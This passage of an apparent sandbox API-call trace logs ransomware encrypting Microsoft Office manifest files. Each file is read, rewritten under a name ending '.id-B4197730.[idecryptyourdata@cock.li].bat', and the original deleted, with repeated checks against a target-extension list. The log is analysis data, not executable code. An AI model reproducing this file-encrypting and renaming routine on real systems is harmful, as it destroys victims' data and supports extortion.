Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-006e-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0059.150] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0059.150] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0059.150] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-006e-0409-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0059.150] GetLastError () returned 0x0 [0059.150] ReadFile (in: hFile=0x354, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x3a41, lpOverlapped=0x0) returned 1 [0059.285] WriteFile (in: hFile=0x350, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x3a50, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x3a50, lpOverlapped=0x0) returned 1 [0059.287] ReadFile (in: hFile=0x354, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0059.287] WriteFile (in: hFile=0x350, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x13e, lpOverlapped=0x0) returned 1 [0059.287] SetEndOfFile (hFile=0x350) returned 1 [0059.288] CloseHandle (hObject=0x350) returned 1 [0059.289] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0059.289] SetEndOfFile (hFile=0x354) returned 1 [0059.290] CloseHandle (hObject=0x354) returned 1 [0059.290] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0059.290] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-006e-0409-1000-0000000ff1ce.xml")) returned 1 [0059.291] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml") returned 104 [0059.291] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml") returned 104 [0059.291] lstrlenW (lpString=".doc") returned 4 [0059.291] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0059.291] lstrlenW (lpString=".docx") returned 5 [0059.291] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0059.291] lstrlenW (lpString=".pdf") returned 4 [0059.291] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0059.291] lstrlenW (lpString=".xls") returned 4 [0059.291] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0059.291] lstrlenW (lpString=".xlsx") returned 5 [0059.291] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0059.291] lstrlenW (lpString=".ppt") returned 4 [0059.291] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0059.292] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml") returned 104 [0059.292] lstrlenW (lpString=".zip") returned 4 [0059.292] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0059.292] lstrlenW (lpString=".rar") returned 4 [0059.292] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0059.292] lstrlenW (lpString=".bz2") returned 4 [0059.292] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0059.292] lstrlenW (lpString=".7z") returned 3 [0059.292] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0059.292] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml") returned 104 [0059.292] lstrlenW (lpString=".dbf") returned 4 [0059.292] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0059.292] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml") returned 104 [0059.292] lstrlenW (lpString=".1cd") returned 4 [0059.292] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0059.292] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml") returned 104 [0059.292] lstrlenW (lpString=".jpg") returned 4 [0059.292] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0059.292] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml") returned 104 [0059.292] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml") returned 104 [0059.292] lstrlenW (lpString=".doc") returned 4 [0059.292] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0059.292] lstrlenW (lpString=".docx") returned 5 [0059.292] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0059.292] lstrlenW (lpString=".pdf") returned 4 [0059.292] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0059.292] lstrlenW (lpString=".xls") returned 4 [0059.292] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0059.293] lstrlenW (lpString=".xlsx") returned 5 [0059.293] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0059.293] lstrlenW (lpString=".ppt") returned 4 [0059.293] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0059.293] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml") returned 104 [0059.293] lstrlenW (lpString=".zip") returned 4 [0059.293] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0059.293] lstrlenW (lpString=".rar") returned 4 [0059.293] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0059.293] lstrlenW (lpString=".bz2") returned 4 [0059.293] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0059.293] lstrlenW (lpString=".7z") returned 3 [0059.293] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0059.293] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml") returned 104 [0059.293] lstrlenW (lpString=".dbf") returned 4 [0059.293] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0059.293] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml") returned 104 [0059.293] lstrlenW (lpString=".1cd") returned 4 [0059.293] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0059.293] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml") returned 104 [0059.293] lstrlenW (lpString=".jpg") returned 4 [0059.293] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0059.293] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0059.293] lstrlenW (lpString="AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml") returned 53 [0059.294] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0090-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0059.296] GetFileSizeEx (in: hFile=0x350, lpFileSize=0x2d0ff14 | out: lpFileSize=0x2d0ff14*=1261) returned 1 [0059.296] CloseHandle (hObject=0x350) returned 1 [0059.296] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0090-0409-1000-0000000ff1ce.xml")) returned 0x220 [0059.296] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0090-0409-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0059.297] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0090-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0059.297] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0059.297] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0059.297] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0090-0409-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0059.299] GetLastError () returned 0x0 [0059.299] ReadFile (in: hFile=0x350, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x4ed, lpOverlapped=0x0) returned 1 [0059.389] WriteFile (in: hFile=0x344, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x4f0, lpOverlapped=0x0) returned 1 [0059.390] ReadFile (in: hFile=0x350, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0059.390] WriteFile (in: hFile=0x344, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x13e, lpOverlapped=0x0) returned 1 [0059.390] SetEndOfFile (hFile=0x344) returned 1 [0059.390] CloseHandle (hObject=0x344) returned 1 [0059.391] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0059.391] SetEndOfFile (hFile=0x350) returned 1 [0059.392] CloseHandle (hObject=0x350) returned 1 [0059.392] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0059.392] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0090-0409-1000-0000000ff1ce.xml")) returned 1 [0059.392] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml") returned 104 [0059.392] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml") returned 104 [0059.392] lstrlenW (lpString=".doc") returned 4 [0059.392] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0059.392] lstrlenW (lpString=".docx") returned 5 [0059.392] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0059.392] lstrlenW (lpString=".pdf") returned 4 [0059.393] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0059.393] lstrlenW (lpString=".xls") returned 4 [0059.393] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0059.393] lstrlenW (lpString=".xlsx") returned 5 [0059.393] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0059.393] lstrlenW (lpString=".ppt") returned 4 [0059.393] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0059.393] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml") returned 104 [0059.393] lstrlenW (lpString=".zip") returned 4 [0059.393] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0059.393] lstrlenW (lpString=".rar") returned 4 [0059.393] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0059.393] lstrlenW (lpString=".bz2") returned 4 [0059.393] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0059.393] lstrlenW (lpString=".7z") returned 3 [0059.393] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0059.393] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml") returned 104 [0059.393] lstrlenW (lpString=".dbf") returned 4 [0059.393] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0059.393] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml") returned 104 [0059.393] lstrlenW (lpString=".1cd") returned 4 [0059.393] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0059.393] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml") returned 104 [0059.393] lstrlenW (lpString=".jpg") returned 4 [0059.393] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0059.393] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml") returned 104 [0059.393] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml") returned 104 [0059.393] lstrlenW (lpString=".doc") returned 4 [0059.394] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0059.394] lstrlenW (lpString=".docx") returned 5 [0059.394] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0059.394] lstrlenW (lpString=".pdf") returned 4 [0059.394] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0059.394] lstrlenW (lpString=".xls") returned 4 [0059.394] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0059.394] lstrlenW (lpString=".xlsx") returned 5 [0059.394] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0059.394] lstrlenW (lpString=".ppt") returned 4 [0059.394] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0059.394] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml") returned 104 [0059.394] lstrlenW (lpString=".zip") returned 4 [0059.394] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0059.394] lstrlenW (lpString=".rar") returned 4 [0059.394] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0059.394] lstrlenW (lpString=".bz2") returned 4 [0059.394] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0059.394] lstrlenW (lpString=".7z") returned 3 [0059.394] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0059.394] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml") returned 104 [0059.394] lstrlenW (lpString=".dbf") returned 4 [0059.394] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0059.394] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml") returned 104 [0059.394] lstrlenW (lpString=".1cd") returned 4 [0059.394] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0059.394] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml") returned 104 [0059.394] lstrlenW (lpString=".jpg") returned 4 [0059.394] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0059.395] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0059.395] lstrlenW (lpString="AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml") returned 53 [0059.395] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00b4-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0059.407] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x2d0ff14 | out: lpFileSize=0x2d0ff14*=1261) returned 1 [0059.407] CloseHandle (hObject=0x358) returned 1 [0059.407] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00b4-0409-1000-0000000ff1ce.xml")) returned 0x220 [0059.407] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00b4-0409-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0059.407] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00b4-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0059.407] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0059.407] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0059.407] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00b4-0409-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0059.409] GetLastError () returned 0x0 [0059.409] ReadFile (in: hFile=0x358, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x4ed, lpOverlapped=0x0) returned 1 [0059.412] WriteFile (in: hFile=0x350, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x4f0, lpOverlapped=0x0) returned 1 [0059.413] ReadFile (in: hFile=0x358, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0059.413] WriteFile (in: hFile=0x350, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x13e, lpOverlapped=0x0) returned 1 [0059.413] SetEndOfFile (hFile=0x350) returned 1 [0059.413] CloseHandle (hObject=0x350) returned 1 [0059.414] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0059.414] SetEndOfFile (hFile=0x358) returned 1 [0059.415] CloseHandle (hObject=0x358) returned 1 [0059.415] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0059.415] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00b4-0409-1000-0000000ff1ce.xml")) returned 1 [0059.415] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml") returned 104 [0059.415] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml") returned 104 [0059.415] lstrlenW (lpString=".doc") returned 4 [0059.415] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0059.415] lstrlenW (lpString=".docx") returned 5 [0059.416] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0059.416] lstrlenW (lpString=".pdf") returned 4 [0059.416] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0059.416] lstrlenW (lpString=".xls") returned 4 [0059.416] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0059.416] lstrlenW (lpString=".xlsx") returned 5 [0059.416] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0059.416] lstrlenW (lpString=".ppt") returned 4 [0059.416] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0059.416] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml") returned 104 [0059.416] lstrlenW (lpString=".zip") returned 4 [0059.416] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0059.416] lstrlenW (lpString=".rar") returned 4 [0059.416] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0059.416] lstrlenW (lpString=".bz2") returned 4 [0059.416] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0059.416] lstrlenW (lpString=".7z") returned 3 [0059.416] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0059.416] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml") returned 104 [0059.416] lstrlenW (lpString=".dbf") returned 4 [0059.416] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0059.416] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml") returned 104 [0059.416] lstrlenW (lpString=".1cd") returned 4 [0059.416] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0059.416] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml") returned 104 [0059.416] lstrlenW (lpString=".jpg") returned 4 [0059.416] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0059.416] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml") returned 104 [0059.417] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml") returned 104 [0059.417] lstrlenW (lpString=".doc") returned 4 [0059.417] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0059.417] lstrlenW (lpString=".docx") returned 5 [0059.417] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0059.417] lstrlenW (lpString=".pdf") returned 4 [0059.417] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0059.417] lstrlenW (lpString=".xls") returned 4 [0059.417] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0059.417] lstrlenW (lpString=".xlsx") returned 5 [0059.417] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0059.417] lstrlenW (lpString=".ppt") returned 4 [0059.417] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0059.417] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml") returned 104 [0059.417] lstrlenW (lpString=".zip") returned 4 [0059.417] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0059.417] lstrlenW (lpString=".rar") returned 4 [0059.417] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0059.417] lstrlenW (lpString=".bz2") returned 4 [0059.417] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0059.417] lstrlenW (lpString=".7z") returned 3 [0059.417] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0059.417] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml") returned 104 [0059.417] lstrlenW (lpString=".dbf") returned 4 [0059.417] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0059.417] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml") returned 104 [0059.417] lstrlenW (lpString=".1cd") returned 4 [0059.417] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0059.417] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml") returned 104 [0059.418] lstrlenW (lpString=".jpg") returned 4 [0059.418] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0059.418] lstrcmpiW (lpString1=".xml", 